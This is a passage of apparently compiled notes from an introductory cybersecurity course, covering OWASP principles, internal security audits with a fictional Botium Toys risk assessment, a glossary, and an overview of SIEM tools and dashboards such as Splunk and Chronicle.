Keep security simple: Avoid unnecessarily complicated solutions. Complexity makes
security difficult.
●
Fix security issues correctly: When security incidents occur, identify the root cause,
contain the impact, identify vulnerabilities, and conduct tests to ensure that
remediation is successful.
Additional OWASP security principles
Next, you’ll learn about four additional OWASP security principles that cybersecurity
analysts and their teams use to keep organizational operations and people safe.
Establish secure defaults
This principle means that the optimal security state of an application is also its default state
for users; it should take extra work to make the application insecure.
Fail securely
Fail securely means that when a control fails or stops, it should do so by defaulting to its
most secure option. For example, when a firewall fails it should simply close all connections
and block all new ones, rather than start accepting everything.
Don’t trust services
Many organizations work with third-party partners. These outside partners often have
different security policies than the organization does. And the organization shouldn’t
explicitly trust that their partners’ systems are secure. For example, if a third-party vendor
tracks reward points for airline customers, the airline should ensure that the balance is
accurate before sharing that information with their customers.
Avoid security by obscurity
The security of key systems should not rely on keeping details hidden. Consider the
following example from OWASP (2016):
The security of an application should not rely on keeping the source code secret. Its
security should rely upon many other factors, including reasonable password policies,
defense in depth, business transaction limits, solid network architecture, and fraud and
audit controls.
Key takeaways
Cybersecurity professionals are constantly applying security principles to safeguard
organizations and the people they serve. As an entry-level security analyst, you can use
these security principles to promote safe development practices that reduce risks to
companies and users alike.
Plan a security audit
There are two main types of security audits:
external and internal. We'll focus on internal security audits because those are the types of audits
that
entry-level analysts might be asked to contribute to. An internal security audit is typically conducted
by a team of people that might include an organization's compliance officer, security manager, and
other security team members. Internal security audits are used to help improve an organization's
security posture and help organizations avoid fines from governing agencies due to a lack of
compliance. Internal security audits help security teams identify organizational risk, assess
controls, and correct compliance issues. Now that we've discussed the purposes of internal audits,
let's cover some common elements of internal audits. These include establishing the scope and goals
of the audit, conducting a risk assessment of the organization's assets, completing a controls
assessment, assessing compliance, and communicating results to stakeholders. In this video, we'll
cover the first two elements, which are a part of the audit planning process: establishing the scope
and goals, then completing a risk assessment. Scope refers to the specific criteria of an internal
security audit. Scope requires organizations to identify people, assets, policies, procedures, and
technologies that might impact an organization's security posture. Goals are an outline of the
organization's security objectives, or what they want to achieve to improve their security posture.
Although more senior-level security team members and other stakeholders usually establish the
scope and goals of the audit, entry-level analysts might be asked to review and understand the
scope and goals to complete other elements of the audit. As an example, the scope of this audit
involves assessing user permissions; identifying existing controls, policies, and procedures; and
accounting for the technology currently in use by the organization. The goals outlined include
implementing core functions of frameworks, like the NIST CSF; establishing policies and procedures
to ensure compliance; and strengthening system controls. The next element is conducting a risk
assessment, which is focused on identifying potential threats, risks, and vulnerabilities. This helps
organizations consider what security measures should be implemented and monitored to ensure
the safety of assets. Similar to establishing the scope and goals, a risk assessment is oftentimes
completed by managers or other stakeholders. However, you might be asked to analyze details
provided in the risk assessment to consider what types of controls and compliance regulations need
to be in place to help improve the organization's security posture. For example, this risk assessment
highlights that there are inadequate controls, processes, and procedures in place to protect the
organization's assets. Specifically, there is a lack of proper management of physical and digital
assets, including employee equipment. The equipment used to store data is not properly secured.
And access to private information stored in the organization's internal network likely needs more
robust controls in place.
The remaining elements are completing a controls assessment, assessing compliance, and
communicating results. Before completing these last three elements, you'll need to review the scope
and goals, as well as the risk assessment, and ask yourself some questions. For example: What is the
audit meant to achieve? Which assets are most at risk? Are current controls sufficient to protect
those assets? If not, what controls and compliance regulations need to be implemented?
Considering questions like these can support your ability to complete the next element: a controls
assessment. A controls assessment involves closely reviewing an organization's existing assets, then
evaluating potential risks to those assets, to ensure internal controls and processes are effective. To
do this, entry-level analysts might be tasked with classifying controls into the following categories:
administrative controls, technical controls, and physical controls. Administrative controls are
related to the human component of cybersecurity. They include policies and procedures that define
how an organization manages data, such as the implementation of password policies. Technical
controls are hardware and software solutions used to protect assets, such as the use of intrusion
detection systems, or IDS's, and encryption. Physical controls refer to measures put in place to
prevent physical access to protected assets, such as surveillance cameras and locks. The next
element is determining whether the organization is adhering to necessary compliance regulations.
As a reminder, compliance regulations are laws that organizations must follow to ensure private
data remains secure. In this example, the organization conducts business in the European Union
and accepts credit card payments. So they need to adhere to the GDPR and Payment Card Industry
Data Security Standard, or PCI DSS. The final common element of an internal security audit is
communication. Once the internal security audit is complete, results and recommendations need to
be communicated to stakeholders. In general, this type of communication summarizes the scope
and goals of the audit. Then, it lists existing risks and notes how quickly those risks need to be
addressed. Additionally, it identifies compliance regulations the organization needs to adhere to
and provides recommendations for improving the organization's security posture. Internal audits
are a great way to identify gaps within an organization. When I worked at a previous company, my
team and I conducted an internal password audit and found that many of the passwords were weak.
Once we identified this issue, the compliance team took the lead and began enforcing stricter
password policies. Audits are an opportunity to determine what security measures an organization
has in place and what areas need to be improved to achieve the organization's desired security
posture. Security audits are quite involved, yet of extreme value to organizations.
More about security audits
Previously, you were introduced to how to plan and complete an internal security audit. In this reading,
you will learn more about security audits, including the goals and objectives of audits.
Security audits
A security audit is a review of an organization's security controls, policies, and procedures against a set
of expectations. Audits are independent reviews that evaluate whether an organization is meeting
internal and external criteria. Internal criteria include outlined policies, procedures, and best practices.
External criteria include regulatory compliance, laws, and federal regulations.
Additionally, a security audit can be used to assess an organization's established security controls. As a
reminder, security controls are safeguards designed to reduce specific security risks.
Audits help ensure that security checks are made (i.e., daily monitoring of security information and
event management dashboards), to identify threats, risks, and vulnerabilities. This helps maintain an
organization’s security posture. And, if there are security issues, a remediation process must be in place.
Goals and objectives of an audit
The goal of an audit is to ensure an organization's information technology (IT) practices are meeting
industry and organizational standards. The objective is to identify and address areas of remediation and
growth. Audits provide direction and clarity by identifying what the current failures are and developing
a plan to correct them.
Security audits must be performed to safeguard data and avoid penalties and fines from governmental
agencies. The frequency of audits is dependent on local laws and federal compliance regulations.
Factors that affect audits
Factors that determine the types of audits an organization implements include:
●
Industry type
●
●
●
●
Organization size
Ties to the applicable government regulations
A business’s geographical location
A business decision to adhere to a specific regulatory compliance
To review common compliance regulations that different organizations need to adhere to, refer to the
reading about controls, frameworks, and compliance.
The role of frameworks and controls in audits
Along with compliance, it’s important to mention the role of frameworks and controls in security audits.
Frameworks such as the National Institute of Standards and Technology Cybersecurity Framework
(NIST CSF) and the international standard for information security (ISO 27000) series are designed to
help organizations prepare for regulatory compliance security audits. By adhering to these and other
relevant frameworks, organizations can save time when conducting external and internal audits.
Additionally, frameworks, when used alongside controls, can support organizations’ ability to align with
regulatory compliance requirements and standards.
There are three main categories of controls to review during an audit, which are administrative and/or
managerial, technical, and physical controls. To learn more about specific controls related to each
category, click the following link and select “Use Template.”
Link to template: Control categories
Audit checklist
It’s necessary to create an audit checklist before conducting an audit. A checklist is generally made up of
the following areas of focus:
Identify the scope of the audit
●
The audit should:
o List assets that will be assessed (e.g., firewalls are configured correctly, PII is secure,
physical assets are locked, etc.)
o Note how the audit will help the organization achieve its desired goals
o Indicate how often an audit should be performed
o Include an evaluation of organizational policies, protocols, and procedures to make sure
they are working as intended and being implemented by employees
Complete a risk assessment
●
A risk assessment is used to evaluate identified organizational risks related to budget, controls,
internal processes, and external standards (i.e., regulations).
Conduct the audit
●
When conducting an internal audit, you will assess the security of the identified assets listed in
the audit scope.
Create a mitigation plan
●
A mitigation plan is a strategy established to lower the level of risk and potential costs, penalties,
or other issues that can negatively affect the organization’s security posture.
Communicate results to stakeholders
●
The result of this process is providing a detailed report of findings, suggested improvements
needed to lower the organization's level of risk, and compliance regulations and standards the
organization needs to adhere to.
Key takeaways
In this reading you learned more about security audits, including what they are; why they’re conducted;
and the role of frameworks, controls, and compliance in audits.
Although there is much more to learn about security audits, this introduction is meant to support your
ability to complete an audit of your own for a self-reflection portfolio activity later in this course.
Resources for more information
Resources that you can explore to further develop your understanding of audits in the cybersecurity
space are:
●
●
Assessment and Auditing Resources
IT Disaster Recovery Plan – Ready.gov, government website to plan for all types of emergencies
Portfolio Activity – Conduct a Security Audit
Activity Overview
In part one of this activity, you will conduct an internal security audit, which you can include in your
cybersecurity portfolio. To review the importance of building a professional portfolio and options for
creating your portfolio, read Create a cybersecurity portfolio.
As a reminder, audits help ensure that security checks are made, to monitor for threats, risks, or
vulnerabilities that can affect an organization’s business continuity and critical assets.
Be sure to complete this activity and answer the questions that follow before moving on. The next
course item will provide you with a completed exemplar to compare to your own work.
Scenario
Review the following scenario. Then complete the step-by-step instructions.
This scenario is based on a fictional company:
Botium Toys is a small U.S. business that develops and sells toys. The business has a single physical
location, which serves as their main office, a storefront, and warehouse for their products. However,
Botium Toy’s online presence has grown, attracting customers in the U.S. and abroad. As a result, their
information technology (IT) department is under increasing pressure to support their online market
worldwide.
The manager of the IT department has decided that an internal IT audit needs to be conducted. She
expresses concerns about not having a solidified plan of action to ensure business continuity and
compliance, as the business grows. She believes an internal audit can help better secure the company’s
infrastructure and help them identify and mitigate potential risks, threats, or vulnerabilities to critical
assets. The manager is also interested in ensuring that they comply with regulations related to internally
processing and accepting online payments and conducting business in the European Union (E.U.).
The IT manager starts by implementing the National Institute of Standards and Technology
Cybersecurity Framework (NIST CSF), establishing an audit scope and goals, listing assets currently
managed by the IT department, and completing a risk assessment. The goal of the audit is to provide an
overview of the risks and/or fines that the company might experience due to the current state of their
security posture.
Your task is to review the IT manager’s scope, goals, and risk assessment report. Then, perform an
internal audit by completing a controls and compliance checklist.
Follow the instructions to complete each step of the activity. Then, answer the 5 questions at the end of
the activity before going to the next course item to compare your work to the completed exemplar.
Step 1: Access supporting materials
The following supporting materials will help you complete this activity. Keep materials open as you
proceed to the next steps.
To use the supporting materials for this course item, click the links.
Links to supporting materials:
●
●
Botium Toys: Scope, goals, and risk assessment report
Control categories
Step 2: Conduct the audit: Controls and compliance checklist
Botium Toys: Scope, goals, and risk assessment report
Scope and goals of the audit
Scope: The scope is defined as the entire security program at Botium Toys. This means
all assets need to be assessed alongside internal processes and procedures related to
the implementation of controls and compliance best practices.
Goals: Assess existing assets and complete the controls and compliance checklist to
determine which controls and compliance best practices need to be implemented to
improve Botium Toys’ security posture.
Current assets
Assets managed by the IT Department include:
● On-premises equipment for in-office business needs
● Employee equipment: end-user devices (desktops/laptops, smartphones),
remote workstations, headsets, cables, keyboards, mice, docking stations,
surveillance cameras, etc.
● Storefront products available for retail sale on site and online; stored in the
company’s adjoining warehouse
● Management of systems, software, and services: accounting,
telecommunication, database, security, ecommerce, and inventory
management
● Internet access
● Internal network
● Data retention and storage
● Legacy system maintenance: end-of-life systems that require human
monitoring
Risk assessment
Risk description
Currently, there is inadequate management of assets. Additionally, Botium Toys does
not have all of the proper controls in place and may not be fully compliant with U.S. and
international regulations and standards.
Control best practices
The first of the five functions of the NIST CSF is Identify. Botium Toys will need to
dedicate resources to identify assets so they can appropriately manage them.
Additionally, they will need to classify existing assets and determine the impact of the
loss of existing assets, including systems, on business continuity.
Risk score
On a scale of 1 to 10, the risk score is 8, which is fairly high. This is due to a lack of
controls and adherence to compliance best practices.
Additional comments
The potential impact from the loss of an asset is rated as medium because the IT department does
not know which assets would be at risk. The risk to assets or fines from governing bodies is high
because Botium Toys does not have all of the necessary controls in place and is not fully adhering to
best practices related to compliance regulations that keep critical data private/secure. Review the
following bullet points for specific details:
● Currently, all Botium Toys employees have access to internally stored data and may be able to
access cardholder data and customers’ PII/SPII.
● Encryption is not currently used to ensure confidentiality of customers’ credit card information
that is accepted, processed, transmitted, and stored locally in the company’s internal database.
● Access controls pertaining to least privilege and separation of duties have not been implemented.
● The IT department has ensured availability and integrated controls to ensure data integrity.
● The IT department has a firewall that blocks traffic based on an appropriately defined set of
security rules.
● Antivirus software is installed and monitored regularly by the IT department.
● The IT department has not installed an intrusion detection system (IDS).
● There are no disaster recovery plans currently in place, and the company does not have backups
of critical data.
● The IT department has established a plan to notify E.U. customers within 72 hours if there is a
security breach. Additionally, privacy policies, procedures, and processes have been developed and
are enforced among IT department members/other employees, to properly document and maintain
data.
● Although a password policy exists, its requirements are nominal and not in line with current
minimum password complexity requirements (e.g., at least eight characters, a combination of
letters and at least one number; special characters).
● There is no centralized password management system that enforces the password policy’s
minimum requirements, which sometimes affects productivity when employees/vendors submit a
ticket to the IT department to recover or reset a password.
● While legacy systems are monitored and maintained, there is no regular schedule in place for
these tasks and intervention methods are unclear.
● The store’s physical location, which includes Botium Toys’ main offices, store front, and
warehouse of products, has sufficient locks, up-to-date closed-circuit television (CCTV)
surveillance, as well as functioning fire detection and prevention systems.
Pro Tip: Save a copy of your work
Finally, be sure to download and save a copy of your completed activity to your own device. You can
upload it to the portfolio platform of your choice, then share with potential employers to help
demonstrate your knowledge and experience.
What to Include in Your Response
Be sure to address the following elements in your completed activity:
Controls and compliance checklist
●
●
●
“Yes” or “no” is selected to answer the question related to each control listed
“Yes” or “no” is selected toanswer the question related to each compliance best practice
A recommendation is provided for the IT manager (optional)
Step 3: Assess your activity
The following is a self-assessment for your controls and compliance checklist. You will use these
statements to review your own work. The self-assessment process is an important part of the learning
experience because it allows you to objectively assess your security audit.
There are a total of 5 points possible for this activity and each statement is worth 1 point. The items
correspond to each step you completed for the activity.
To complete the self-assessment, first open your controls assessment and compliance checklist. Then
respond yes or no to each statement.
Asset: An item perceived as having value to an organization
Attack vectors: The pathways attackers use to penetrate security defenses
Authentication: The process of verifying who someone is
Authorization: The concept of granting access to specific resources in a system
Availability: The idea that data is accessible to those who are authorized to access it
Biometrics: The unique physical characteristics that can be used to verify a person’s identity
Confidentiality: The idea that only authorized users can access specific assets or data
Confidentiality, integrity, availability (CIA) triad: A model that helps inform how organizations consider
risk when setting up systems and security policies
Detect: A NIST core function related to identifying potential security incidents and improving
monitoring capabilities to increase the speed and efficiency of detections
Encryption: The process of converting data from a readable format to an encoded format
Identify: A NIST core function related to management of cybersecurity risk and its effect on an
organization’s people and assets
Integrity: The idea that the data is correct, authentic, and reliable
National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF): A voluntary
framework that consists of standards, guidelines, and best practices to manage cybersecurity risk
National Institute of Standards and Technology (NIST) Special Publication (S.P.) 800-53: A unified
framework for protecting the security of information systems within the U.S. federal government
Open Web Application Security Project/Open Worldwide Application Security Project (OWASP): A nonprofit organization focused on improving software security
Protect: A NIST core function used to protect an organization through the implementation of policies,
procedures, training, and tools that help mitigate cybersecurity threats
Recover: A NIST core function related to returning affected systems back to normal operation
Respond: A NIST core function related to making sure that the proper procedures are used to contain,
neutralize, and analyze security incidents, and implement improvements to the security process
Risk: Anything that can impact the confidentiality, integrity, or availability of an asset
Security audit: A review of an organization's security controls, policies, and procedures against a set of
expectations
Security controls: Safeguards designed to reduce specific security risks
Security frameworks: Guidelines used for building plans to help mitigate risk and threats to data and
privacy
Security posture: An organization’s ability to manage its defense of critical assets and data and react to
change
Explaining the concept of "security posture" in an accessible way can be done by using a simple analogy:
"Imagine your digital life, whether it's your computer, smartphone, or even your email accounts, as a
castle. Your security posture is like the strength and readiness of your castle's defenses.
1. Strong Castle Walls: In a good security posture, your castle has strong walls, just like your devices
have strong passwords and security measures. These walls protect your personal information and data
from intruders.
2. Guards at the Gates: Your castle has guards at the gates who check everyone who wants to enter.
Similarly, your security posture includes measures like firewalls and antivirus software that guard your
digital "gates" to keep out cyber threats.
3. Locks on the Doors: You have locks on all the doors and windows of your castle to keep them secure.
In the digital world, encryption and secure login methods act like locks, ensuring only authorized users
can access your information.
4. Alarm System: If someone tries to break into your castle, an alarm goes off to alert you. In your digital
life, intrusion detection systems serve as alarms, letting you know if there's a security breach.
5. Regular Maintenance: Just like a castle needs regular upkeep to stay strong, your security posture
requires regular updates and patches to fix any weak spots or vulnerabilities.
So, your security posture is all about how well you've set up these defenses to protect your digital world.
A strong security posture means your castle is well-prepared to fend off digital threats, keeping your
personal information safe and secure."
Threat: Any circumstance or event that can negatively impact assets
Security information and event management (SIEM) dashboards
Logs and SIEM Tools– As a security analyst, one of your responsibilities might include analyzing
log data to mitigate and manage threats, risks, and vulnerabilities. As a reminder, a log is a record of
events that occur within an organization's systems and networks. Security analysts access a variety
of logs from different sources. Three common log sources include firewall logs, network logs, and
server logs. Let's explore each of these log sources in more detail. A firewall log is a record of
attempted or established connections for incoming traffic from the internet. It also includes
outbound requests to the internet from within the network. A network log is a record of all
computers and devices that enter and leave the network. It also records connections between
devices and services on the network. Finally, a server log is a record of events related to services
such as websites, emails, or file shares. It includes actions such as login, password, and username
requests. By monitoring logs, like the one shown here, security teams can identify vulnerabilities
and potential data breaches. Understanding logs is important because SIEM tools rely on logs to
monitor systems and detect security threats. A security information an event management, or SIEM,
tool is an application that collects and analyzes log data to monitor critical activities in an
organization. It provides real-time visibility, event monitoring and analysis, and automated alerts. It
also stores all log data in a centralized location. Because SIEM tools index and minimize the number
of logs a security professional must manually review and analyze, they increase efficiency and save
time. But, SIEM tools must be configured and customized to meet each organization's unique
security needs. As new threats and vulnerabilities emerge, organizations must continually
customize their SIEM tools to ensure that threats are detected and quickly addressed. Later in the
certificate program, you'll have a chance to practice using different SIEM tools to identify potential
security incidents.
SIEM Dashboards
SIEM tools can also be used to create dashboards. You might have
encountered dashboards in an app on your phone or other device. They present information
about your account or location in a format that's easy to understand. For example, weather apps
display data like temperature, precipitation, wind speed, and the forecast using charts, graphs, and
other visual elements. This format makes it easy to quickly identify weather patterns and trends, so
you can stay prepared and plan your day accordingly. Just like weather apps help people make
quick and informed decisions based on data, SIEM dashboards help security analysts quickly and
easily access their organization's security information as charts, graphs, or tables. For example, a
security analyst receives an alert about a suspicious login attempt. The analyst accesses their SIEM
dashboard to gather information about this alert. Using the dashboard, the analyst discovers that
there have been 500 login attempts for Ymara's account in the span of five-minutes. They also
discover that the login attempts happened from geographic locations outside of Ymara's usual
location and outside of her usual working hours. By using a dashboard, the security analyst was
able to quickly review visual representations of the timeline of the login attempts, the location, and
the exact time of the activity, then determine that the activity was suspicious. In addition to
providing a comprehensive summary of security-related data, SIEM dashboards also provide
stakeholders with different metrics. Metrics are key technical attributes such as response time,
availability, and failure rate, which are used to assess the performance of a software application.
SIEM dashboards can be customized to display specific metrics or other data that are relevant to
different members in an organization. For example, a security analyst may create a dashboard that
displays metrics for monitoring everyday business operations, like the volume of incoming and
outgoing network traffic. We've examined how security analysts use SIEM dashboards to help
organizations maintain their security posture.
The future of SIEM tools
Previously, you were introduced to security information and event management (SIEM) tools, along
with a few examples of SIEM tools. In this reading, you will learn more about how SIEM tools are used to
protect organizational operations. You will also gain insight into how and why SIEM tools are changing
to help protect organizations and the people they serve from evolving threat actor tactics and
techniques.
Current SIEM solutions
A SIEM tool is an application that collects and analyzes log data to monitor critical activities in an
organization. SIEM tools offer real-time monitoring and tracking of security event logs. The data is then
used to conduct a thorough analysis of any potential security threat, risk, or vulnerability identified.
SIEM tools have many dashboard options. Each dashboard option helps cybersecurity team members
manage and monitor organizational data. However, currently, SIEM tools require human interaction for
analysis of security events.
The future of SIEM tools
As cybersecurity continues to evolve, the need for cloud functionality has increased. SIEM tools have and
continue to evolve to function in cloud-hosted and cloud-native environments. Cloud-hosted SIEM tools
are operated by vendors who are responsible for maintaining and managing the infrastructure required
to use the tools. Cloud-hosted tools are simply accessed through the internet and are an ideal solution
for organizations that don’t want to invest in creating and maintaining their own infrastructure.
The difference between cloud-hosted SIEM (Security Information and Event Management) tools and
cloud-native SIEM tools lies in how they are deployed and where they primarily operate. Let's break
down the distinctions:
**Cloud-Hosted SIEM Tools:**
1. **Deployment Location:** Cloud-hosted SIEM tools are typically traditional SIEM solutions that were
originally designed for on-premises deployment. However, they have been adapted to run in the cloud
environment. This means they are hosted in cloud servers but were not originally built with the cloud in
mind.
2. **Scalability:** Cloud-hosted SIEM tools may offer some degree of scalability, as they can leverage
cloud resources. However, their architecture might not be optimized for the dynamic scaling and
flexibility that native cloud services offer.
3. **Maintenance:** Users are responsible for managing and maintaining the cloud-hosted SIEM
solution, including software updates, security patches, and infrastructure management.
4. **Integration:** They may require additional configuration and integration efforts to work seamlessly
with other cloud-native services and applications.
5. **Cost Structure:** Pricing models for cloud-hosted SIEM tools may involve a combination of licensing
fees, subscription costs, and cloud infrastructure charges, making cost management more complex.
**Cloud-Native SIEM Tools:**
1. **Built for the Cloud:** Cloud-native SIEM tools are purpose-built to operate in cloud environments
from the ground up. They are designed to take full advantage of the cloud's scalability and flexibility.
2. **Scalability:** These tools can easily scale up or down based on demand, allowing organizations to
pay only for the resources they use, which is a cost-effective approach.
3. **Managed Services:** Cloud-native SIEM solutions are often offered as managed services by cloud
providers, which means the provider handles infrastructure management, software updates, and
security patches, reducing the operational burden on users.
4. **Integration:** They are inherently well-integrated with other cloud services and applications,
making it easier to correlate security events and data from various sources within the cloud
environment.
5. **Cost Efficiency:** Cloud-native SIEM tools typically offer more transparent and predictable pricing
structures, often based on usage, which can simplify cost management.
In summary, the key difference between cloud-hosted SIEM tools and cloud-native SIEM tools is their
origin and design. Cloud-hosted SIEM tools are adapted from traditional on-premises solutions to
operate in the cloud, while cloud-native SIEM tools are purpose-built for the cloud, offering greater
scalability, integration, and managed services. Organizations should consider their specific needs and
cloud environment when choosing between these two options.
Similar to cloud-hosted SIEM tools, cloud-native SIEM tools are also fully maintained and managed by
vendors and accessed through the internet. However, cloud-native tools are designed to take full
advantage of cloud computing capabilities, such as availability, flexibility, and scalability.
Yet, the evolution of SIEM tools is expected to continue in order to accommodate the changing nature of
technology, as well as new threat actor tactics and techniques. For example, consider the current
development of interconnected devices with access to the internet, known as the Internet of Things
(IoT). The more interconnected devices there are, the larger the cybersecurity attack surface and the
amount of data that threat actors can exploit. The diversity of attacks and data that require special
attention is expected to grow significantly. Additionally, as artificial intelligence (AI) and machine
learning (ML) technology continues to progress, SIEM capabilities will be enhanced to better identify
threat-related terminology, dashboard visualization, and data storage functionality.
The implementation of automation will also help security teams respond faster to possible incidents,
performing many actions without waiting for a human response. Security orchestration, automation, and
response (SOAR) is a collection of applications, tools, and workflows that uses automation to respond to
security events. Essentially, this means that handling common security-related incidents with the use of
SIEM tools is expected to become a more streamlined process requiring less manual intervention. This
frees up security analysts to handle more complex and uncommon incidents that, consequently, can’t be
automated with a SOAR. Nevertheless, the expectation is for cybersecurity-related platforms to
communicate and interact with one another. Although the technology allowing interconnected systems
and devices to communicate with each other exists, it is still a work in progress.
Key takeaways
SIEM tools play a major role in monitoring an organization’s data. As an entry-level security analyst, you
might monitor SIEM dashboards as part of your daily tasks. Regularly researching new developments in
SIEM technology will help you grow and adapt to the changes in the cybersecurity field. Cloud
computing, SIEM-application integration, and automation are only some of the advancements security
professionals can expect in the future evolution of SIEM tools.
Explore common SIEM tools
let's discuss the different types of SIEM tools that organizations can choose from, based
on their unique security needs. Self-hosted SIEM tools require organizations to install, operate, and
maintain the tool using their own physical infrastructure, such as server capacity. These applications
are then managed and maintained by the organization's IT department, rather than a third-party
vendor. Self-hosted SIEM tools are ideal when an organization is required to maintain physical
control over confidential data. Alternatively, cloud-hosted SIEM tools are maintained and managed
by the SIEM providers, making them accessible through the internet. Cloud-hosted SIEM tools are
ideal for organizations that don't want to invest in creating and maintaining their own
infrastructure. Or, an organization can choose to use a combination of both self-hosted and cloudhosted SIEM tools, known as a hybrid solution. Organizations might choose a hybrid SIEM solution
to leverage the benefits of the cloud while also maintaining physical control over confidential data.
Splunk Enterprise, Splunk Cloud, and Chronicle are common SIEM tools that many organizations
use to help protect their data and systems. Let's begin by discussing Splunk. Splunk is a data
analysis platform and Splunk Enterprise provides SIEM solutions. Splunk Enterprise is a self-hosted
tool used to retain, analyze, and search an organization's log data to provide security information
and alerts in real-time. Splunk Cloud is a cloud-hosted tool used
to collect, search, and monitor log data. Splunk Cloud is helpful for organizations running hybrid or
cloud-only environments, where some or all of the organization's services are in the cloud. Finally,
there's Google's Chronicle. Chronicle is a cloud-native tool designed to retain, analyze, and search
data. Chronicle provides log monitoring, data analysis, and data collection. Like cloud-hosted tools,
cloud-native tools are also fully maintained and managed by the vendor. But cloud-native tools are
specifically designed to take full advantage of cloud computing capabilities such as availability,
flexibility, and scalability. Because threat actors are frequently improving their strategies to
compromise the confidentiality, integrity, and availability of their targets, it's important for
organizations to use a variety of security tools to help defend against attacks. The SIEM tools we
just discussed are only a few examples of the tools available for security teams to use to help defend
their organizations.
More about cybersecurity tools
Previously, you learned about several tools that are used by cybersecurity team members to monitor for
and identify potential security threats, risks, and vulnerabilities. In this reading, you’ll learn more about
common open-source and proprietary cybersecurity tools that you may use as a cybersecurity
professional.
Open-source tools
Open-source tools are often free to use and can be user friendly. The objective of open-source tools is to
provide users with software that is built by the public in a collaborative way, which can result in the
software being more secure. Additionally, open-source tools allow for more customization by users,
resulting in a variety of new services built from the same open-source software package.
Software engineers create open-source projects to improve software and make it available for anyone to
use, as long as the specified license is respected. The source code for open-source projects is readily
available to users, as well as the training material that accompanies them. Having these sources readily
available allows users to modify and improve project materials.
Proprietary tools
Proprietary tools are developed and owned by a person or company, and users typically pay a fee for
usage and training. The owners of proprietary tools are the only ones who can access and modify the
source code. This means that users generally need to wait for updates to be made to the software, and at
times they might need to pay a fee for those updates. Proprietary software generally allows users to
modify a limited number of features to meet individual and organizational needs. Examples of
proprietary tools include Splunk® and Chronicle SIEM tools.
Common misconceptions
There is a common misconception that open-source tools are less effective and not as safe to use as
proprietary tools. However, developers have been creating open-source materials for years that have
become industry standards. Although it is true that threat actors have attempted to manipulate opensource tools, because these tools are open source it is harder for people with malicious intent to
successfully cause harm. The wide exposure and immediate access to the source code by wellintentioned and informed users and professionals makes it less likely for issues to occur, because they
can fix issues as soon as they’re identified.
Examples of open-source tools
In security, there are many tools in use that are open-source and commonly available. Two examples are
Linux and Suricata.
Linux
Linux is an open-source operating system that is widely used. It allows you to tailor the operating
system to your needs using a command-line interface. An operating system is the interface between
computer hardware and the user. It’s used to communicate with the hardware of a computer and
manage software applications.
There are multiple versions of Linux that exist to accomplish specific tasks. Linux and its command-line
interface will be discussed in detail, later in the certificate program.
Suricata
Suricata is an open-source network analysis and threat detection software. Network analysis and threat
detection software is used to inspect network traffic to identify suspicious behavior and generate
network data logs. The detection software finds activity across users, computers, or Internet Protocol
(IP) addresses to help uncover potential threats, risks, or vulnerabilities.
Suricata was developed by the Open Information Security Foundation (OISF). OISF is dedicated to
maintaining open-source use of the Suricata project to ensure it’s free and publicly available. Suricata is
widely used in the public and private sector, and it integrates with many SIEM tools and other security
tools. Suricata will also be discussed in greater detail later in the program.
Key takeaways
Open-source tools are widely used in the cybersecurity profession. Throughout the certificate program,
you will have multiple opportunities to learn about and explore both open-source and proprietary tools
in more depth.
Use SIEM tools to protect organizations
Previously, you were introduced to security information and event management (SIEM) tools and a few
SIEM dashboards. You also learned about different threats, risks, and vulnerabilities an organization
may experience. In this reading, you will learn more about SIEM dashboard data and how cybersecurity
professionals use that data to identify a potential threat, risk, or vulnerability.
Splunk
Splunk offers different SIEM tool options: Splunk® Enterprise and Splunk® Cloud. Both allow you to
review an organization's data on dashboards. This helps security professionals manage an
organization's internal infrastructure by collecting, searching, monitoring, and analyzing log data from
multiple sources to obtain full visibility into an organization’s everyday operations.
Review the following Splunk dashboards and their purposes:
Security posture dashboard
The security posture dashboard is designed for security operations centers (SOCs). It displays the last
24 hours of an organization’s notable security-related events and trends and allows security
professionals to determine if security infrastructure and policies are performing as designed. Security
analysts can use this dashboard to monitor and investigate potential threats in real time, such as
suspicious network activity originating from a specific IP address.
Executive summary dashboard
The executive summary dashboard analyzes and monitors the overall health of the organization over
time. This helps security teams improve security measures that reduce risk. Security analysts might use
this dashboard to provide high-level insights to stakeholders, such as generating a summary of security
incidents and trends over a specific period of time.
Incident review dashboard
The incident review dashboard allows analysts to identify suspicious patterns that can occur in the
event of an incident. It assists by highlighting higher risk items that need immediate review by an
analyst. This dashboard can be very helpful because it provides a visual timeline of the events leading up
to an incident.
Risk analysis dashboard
The risk analysis dashboard helps analysts identify risk for each risk object (e.g., a specific user, a
computer, or an IP address). It shows changes in risk-related activity or behavior, such as a user logging
in outside of normal working hours or unusually high network traffic from a specific computer. A
security analyst might use this dashboard to analyze the potential impact of vulnerabilities in critical
assets, which helps analysts prioritize their risk mitigation efforts.
Chronicle
Chronicle is a cloud-native SIEM tool from Google that retains, analyzes, and searches log data to identify
potential security threats, risks, and vulnerabilities. Chronicle allows you to collect and analyze log data
according to:
●
●
●
●
A specific asset
A domain name
A user
An IP address
Chronicle provides multiple dashboards that help analysts monitor an organization’s logs, create filters
and alerts, and track suspicious domain names.
Review the following Chronicle dashboards and their purposes:
Enterprise insights dashboard
The enterprise insights dashboard highlights recent alerts. It identifies suspicious domain names in logs,
known as indicators of compromise (IOCs). Each result is labeled with a confidence score to indicate the
likelihood of a threat. It also provides a severity level that indicates the significance of each threat to the
organization. A security analyst might use this dashboard to monitor login or data access attempts
related to a critical asset—like an application or system—from unusual locations or devices.
Data ingestion and health dashboard
The data ingestion and health dashboard shows the number of event logs, log sources, and success rates
of data being processed into Chronicle. A security analyst might use this dashboard to ensure that log
sources are correctly configured and that logs are received without error. This helps ensure that log
related issues are addressed so that the security team has access to the log data they need.
IOC matches dashboard
The IOC matches dashboard indicates the top threats, risks, and vulnerabilities to the organization.
Security professionals use this dashboard to observe domain names, IP addresses, and device IOCs over
time in order to identify trends. This information is then used to direct the security team’s focus to the
highest priority threats. For example, security analysts can use this dashboard to search for additional
activity associated with an alert, such as a suspicious user login from an unusual geographic location.
Main dashboard
The main dashboard displays a high-level summary of information related to the organization’s data
ingestion, alerting, and event activity over time. Security professionals can use this dashboard to access
a timeline of security events—such as a spike in failed login attempts— to identify threat trends across
log sources, devices, IP addresses, and physical locations.
Rule detections dashboard
The rule detections dashboard provides statistics related to incidents with the highest occurrences,
severities, and detections over time. Security analysts can use this dashboard to access a list of all the
alerts triggered by a specific detection rule, such as a rule designed to alert whenever a user opens a
known malicious attachment from an email. Analysts then use those statistics to help manage recurring
incidents and establish mitigation tactics to reduce an organization's level of risk.
User sign in overview dashboard
The user sign in overview dashboard provides information about user access behavior across the
